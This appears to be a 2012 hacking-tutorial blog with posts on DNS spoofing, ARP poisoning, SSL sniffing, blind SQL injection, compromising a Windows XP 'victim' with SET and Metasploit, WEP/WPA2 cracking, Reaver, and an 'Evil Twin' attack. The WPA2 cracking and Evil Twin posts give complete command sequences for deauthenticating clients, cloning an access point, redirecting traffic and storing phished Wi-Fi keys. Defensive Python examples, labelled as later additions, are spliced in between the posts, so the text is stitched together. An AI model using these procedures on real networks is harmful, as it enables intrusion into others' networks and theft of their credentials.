
Ettercap: DNS Spoof Configuration

So recently I’ve been trying to run the DNS Spoof plugin from ettercap and kept getting “Dissector DNS not supported” as soon as I ran the program.

After searching I found the original cause of the problem: a bug in the AMD 64-bit architecture.

So the solution was simple: to use the 32-bit version for now, until they develop a working version for amd64.

On to the video: this time we are simply going to host a server and spoof the DNS to redirect ALL TRAFFIC to our server…

Watch in 1080p!


Category: # TechnicDynamic Tutorials | Views: 1419 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

This time we are owning a fully patched XP box just to show the power of Social Engineering Toolkit combined with a dns spoof technique (ettercap).

Attacker: Backtrack 5 R1 (GNOME-32)
Victim: Windows XP SP3 Fully Patched

Tools: S.E.T., Ettercap & Metasploit

Check out the teaser video and expect more on this soon :)


Category: # TechnicDynamic Tutorials | Views: 1289 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

Following up on the last post, we are gonna take it a little further this time…

Attacker: Backtrack 5 R1 Gnome 32
Victim: Windows XP sp3 Fully Patched

We will spoof the network, this time using arpspoof & dnsspoof just because they provide greater finesse! :D
For the Social Engineering Toolkit (SET) attack, I am going to use a custom template for Facebook (seen in an earlier post) since it reduces loading time compared to the cloned pages by S.E.T.

For the payload I choose the Meterpreter session in order to upload a file and make the victim’s Windows machine load that file every time the computer starts.
To achieve this we modify the registry of the XP box via a VNC session.

Enough Talk, let’s check that video in hi-def:

Song: Victor Munhoz & Endo – Funky 2 (JPhil Remix)


Category: # TechnicDynamic Tutorials | Views: 1148 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

I noticed a lot of newcomers have problems adapting to Backtrack Linux right away, since they don’t know basic functionality and commands. So I’ve decided to make this video as a starting point to show some of what is possible on Windows.

In this tutorial we will be using Cain & Abel to sniff SSL passwords. The user has to agree to a fake certificate in this scenario. Luckily most users almost always agree without even looking at it. :)

If you are familiar with Linux I recommend using it instead, since it is much more networking oriented and possesses a lot more tools (all free).

We do an ARP Poison on the network to capture all the traffic between router (default gateway) and host.

Check it out (high quality)!


Category: # TechnicDynamic Tutorials | Views: 1718 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

If you think https is secure, think again.

This time we will be showing a seamless sniffing attack, where the attacker injects the whole network using ARP poisoning to become the man-in-the-middle.

After poisoning the network, all SSL / https traffic is redirected to a normal http (port 10000) without the targets even noticing anything. To top it off we display a lock icon on the webpage to make it seem like an https page.
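On the defending side, the ARP poisoning used in this post and in the Cain & Abel post above shows up as the gateway's IP address suddenly resolving to another host's MAC address. The following is an added example, not part of the original posts: it compares successive neighbour-table snapshots in `ip neigh` output format; the addresses and snapshots are constructed, and the function names are assumptions.

```python
import re

# One line of `ip neigh` output: "<ip> dev <if> lladdr <mac> <state>"
NEIGH = re.compile(r"^(\d+\.\d+\.\d+\.\d+) dev \S+ lladdr ([0-9a-f:]{17})\s", re.I)

def parse_neigh(text):
    """Return {ip: mac}; entries without a MAC (e.g. FAILED) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def arp_findings(snapshots, gateway_ip):
    """Flag IPs whose MAC changed between snapshots, and hosts that
    share the gateway's MAC within one snapshot."""
    findings, previous = [], {}
    for n, text in enumerate(snapshots):
        table = parse_neigh(text)
        for ip, mac in table.items():
            if ip in previous and previous[ip] != mac:
                findings.append((n, "mac-changed", ip, previous[ip], mac))
        gw_mac = table.get(gateway_ip)
        for ip, mac in table.items():
            if gw_mac and ip != gateway_ip and mac == gw_mac:
                findings.append((n, "shares-gateway-mac", ip, gateway_ip, mac))
        previous.update(table)
    return findings

# Constructed snapshots: before and during poisoning of the gateway entry.
SNAPSHOTS = [
    """192.168.1.1 dev eth0 lladdr aa:bb:cc:00:00:01 REACHABLE
       192.168.1.50 dev eth0 lladdr aa:bb:cc:00:00:50 STALE
       192.168.1.66 dev eth0 lladdr aa:bb:cc:00:00:66 STALE
       192.168.1.77 dev eth0 FAILED""",
    """192.168.1.1 dev eth0 lladdr aa:bb:cc:00:00:66 REACHABLE
       192.168.1.50 dev eth0 lladdr aa:bb:cc:00:00:50 STALE
       192.168.1.66 dev eth0 lladdr aa:bb:cc:00:00:66 REACHABLE""",
]

if __name__ == "__main__":
    for finding in arp_findings(SNAPSHOTS, "192.168.1.1"):
        print(finding)
```

A static ARP entry for the gateway, or dynamic ARP inspection on the switch, prevents the changed mapping from being accepted in the first place.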

Check out the video in high quality and leave feedback to TechnicDynamic@gmail.com !

Song: Oblivion, Endo – The Mente


Category: # TechnicDynamic Tutorials | Views: 849 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

This time we will be taking a look at the true & false SQL injection method.

Although most programmers have already noticed this flaw and taken the right countermeasures to prevent it, due to the large number of websites going up every day, there are still many vulnerable pages.

This method is simple overall, however some knowledge of programming and SQL will be handy.

Basically, we want to locate a dynamic field on the website and make it return either true or false. So if we insert a SQL statement asking the database to return a specific number of tables and it returns false, we know the database has fewer tables than what we suggested.

That is the main logic behind the method!

Identifying whether the return was true or false is, mostly, simple. On a false return, the dynamic content will be missing from wherever it should be on the page (either blank, or, upon viewing the source code of the page, one should see: “You have an error…”).
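The true/false behaviour described above comes from pasting the request value into the SQL text. The following added example (not from the original post; the `articles` table and the function names are assumptions) puts that pattern next to a parameterised version, with a regression check that reports whether a field still answers true/false questions.

```python
import sqlite3

def make_db():
    """Constructed in-memory catalogue standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Contact")])
    return db

def render_vulnerable(db, article_id):
    """'Before': the request value is concatenated into the SQL text."""
    sql = "SELECT title FROM articles WHERE id = " + article_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return ""  # the dynamic part of the page goes blank on a SQL error
    return row[0] if row else ""

def render_hardened(db, article_id):
    """'After': check the type, then bind the value as a parameter."""
    if not (article_id.isascii() and article_id.isdigit()):
        return None  # reject; the caller should answer with HTTP 400
    row = db.execute("SELECT title FROM articles WHERE id = ?",
                     (int(article_id),)).fetchone()
    return row[0] if row else ""

def has_boolean_oracle(render, db, base="1"):
    """Regression check: does an always-true suffix give a different page
    from an always-false one? If so, the field answers yes/no questions."""
    return render(db, base + " AND 1=1") != render(db, base + " AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", has_boolean_oracle(render_vulnerable, db))
    print("hardened:  ", has_boolean_oracle(render_hardened, db))
```

Running `has_boolean_oracle` against every dynamic field in a test suite catches a reintroduced string-built query before it ships.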

Check out the video:



Category: # TechnicDynamic Tutorials | Views: 1230 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Still today, it is very common to see small & medium businesses using low security settings on their networks.

In this educational video, we will be looking at how an attacker would gain front door access to a network just by monitoring enough data packets to eventually crack the password.

The wireless network is in default configuration using the WEP encryption method.

Let’s take a look at the gear:

  • Wireless Network Interface Card: Alfa AWUS036NH
  • Computer using Linux Backtrack 5 Operating System

You can use any Linux distribution you like, but I recommend Backtrack because it comes with everything you will need pre-installed. For more information on how to install Backtrack to your computer or run a Live CD, visit their website by clicking on their logo image. Most wireless network interface cards are automatically identified by Backtrack as well.

Make sure you watch the video in high quality (1080p) so you can see the commands:

If you’re relatively new to Linux, I would recommend downloading the commands file and going through each step following the video. Remember to replace the devices in ()’s with the proper device. Example in video: (wireless device) = wlan0.


Songs used for the video credited to Mt. Eden

Thank you for watching and stay tuned for the next video! :)

Category: # TechnicDynamic Tutorials | Views: 725 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

It’s fair to say WPA 2 has done a lot for wireless networks.

It’s made them more secure that’s for sure. However the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:

  • 1. Put wireless interface down, spoof the MAC address (optional) and put wireless interface in monitor mode.
    • ifconfig wlan0 down
    • macchanger --mac 00:22:44:66:88:00 wlan0
    • airmon-ng start wlan0
  • 2. Start sniffing the target wireless network on the specific channel, write capture to file.
    • airodump-ng -c 1 --bssid [Network MAC Addr.] -w [Capture File] mon0
  • 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
    • aireplay-ng -0 0 -a [Network MAC Addr.] -h [Your MAC Addr.] -c [Client MAC Addr.] mon0
  • 4. Now you are ready to crack using the WPA handshake and your wordlist.
    • aircrack-ng --bssid [Network MAC Addr.] -w [Wordlist] [Capture File]

Note: Replace the bracketed content on your own execution.

For further details, check out the video in high quality:


Song: Scalameriya – Memento Mori
Category: # TechnicDynamic Tutorials | Views: 1222 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

In an earlier post, we’ve seen how to crack WPA-2 network keys using a dictionary.

While that technique works, it could take an awfully long time, especially when brute forcing.

On this technique, named ‘Evil Twin’, we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point – which looks exactly like his. :)

When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.

For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called ‘wpa2’, which can be done with the following commands:

Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor

Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Finally, start the apache and mysql services and check everything works by typing localhost in a web browser.

Click here to download the files: [ DOWNLOAD ]

Check out the video:

Song: BGNS – sasas

Commands:

Install dhcp3 and create config file:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf

/etc/dhcp3/dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

Start clone access point:
airmon-ng start wlan0 [channel]
airbase-ng -e "AP name" -c [channel] mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start

Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):
aireplay-ng -0 0 -a [target bssid] [monitor interface]

DeAuthenticate Client (recommended):
aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]
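From the network owner's side, the cloned access point described in this post can be spotted by comparing what is on the air with what you actually operate. The following is an added example, not part of the original post: the inventory, the scan records and all names in it are constructed assumptions, and it flags beacons that use a managed network name but do not match the recorded BSSID, channel or security mode.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # "WPA2", "WEP", "OPEN", ...

# Assumed inventory of the access points you operate (constructed values).
INVENTORY = {
    "OfficeNet": {
        "security": "WPA2",
        "aps": {"aa:bb:cc:00:00:01": 1, "aa:bb:cc:00:00:02": 6},  # BSSID -> channel
    },
}

def find_rogue_aps(beacons, inventory=INVENTORY):
    """Return (bssid, ssid, reasons) for beacons that use a managed SSID
    but do not match the recorded BSSID, channel or security mode."""
    findings = []
    for b in beacons:
        known = inventory.get(b.ssid)
        if known is None:
            continue  # not one of our network names
        reasons = []
        bssid = b.bssid.lower()
        if bssid not in known["aps"]:
            reasons.append("unknown BSSID")
        elif known["aps"][bssid] != b.channel:
            # a copied BSSID seen on a channel the real AP does not use
            reasons.append(f"channel {b.channel}, expected {known['aps'][bssid]}")
        if b.security != known["security"]:
            reasons.append(f"security {b.security}, expected {known['security']}")
        if reasons:
            findings.append((bssid, b.ssid, reasons))
    return findings

# Constructed scan results: two real APs, two clones, one neighbour.
SAMPLE_SCAN = [
    Beacon("OfficeNet", "aa:bb:cc:00:00:01", 1, "WPA2"),
    Beacon("OfficeNet", "aa:bb:cc:00:00:02", 6, "WPA2"),
    Beacon("OfficeNet", "00:22:44:66:88:00", 1, "OPEN"),
    Beacon("OfficeNet", "AA:BB:CC:00:00:01", 11, "WPA2"),
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 3, "OPEN"),
]

if __name__ == "__main__":
    for finding in find_rogue_aps(SAMPLE_SCAN):
        print(finding)
```

A clone that copies BSSID, channel and security mode exactly passes these checks, so pair them with monitoring for bursts of deauthentication frames and with user guidance never to type the Wi-Fi key into a web page.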


Category: # TechnicDynamic Tutorials | Views: 2139 | Added by: Administrator | Date: 2012-03-22 | Comments (0)

Hey guys!

Today we are gonna take a look at the newest tool in hacking wpa/wpa2, Reaver.

This tool brute-forces Wi-Fi Protected Setup, which uses a PIN containing 8 unknown digits; if you do the math (10^8), that’s around 100,000,000 possibilities. Upon discovering the PIN, Reaver returns the WPA / WPA 2 key.

Note that not all routers are affected by this, as the person who configured the router might have disabled WPS. It is known however, that the majority of routers come with WPS enabled.

 

[Image: Router's WPS Button (WPS Synchronization Button)]

Protecting yourself against this attack is simple: disable WPS. This is done by accessing your router (usually at 192.168.1.1 on a class C network) and, after logging in, disabling WPS.

Now let’s check out the video in HD :D


Category: # TechnicDynamic Tutorials | Views: 1274 | Added by: Administrator | Date: 2012-03-22 | Comments (0)
